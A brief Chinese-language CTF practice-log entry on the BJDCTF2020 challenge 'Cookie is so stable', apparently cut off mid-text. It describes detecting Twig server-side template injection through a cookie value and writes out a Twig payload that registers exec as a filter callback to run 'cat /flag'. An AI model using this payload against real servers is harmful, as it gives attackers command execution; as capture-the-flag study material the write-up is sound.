[BUUCTF]刷题记录7

[BJDCTF2020]Cookie is so stable模板注入——Twig模板好像又是个模板注入输入{{7*'7'}}得到了49，猜测是Twig但是好像命令过滤的很严，看看能不能拿源码hint.php提示：可以发现提交的时候会设置一个cookie，里面的值可以进行模板注入{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};...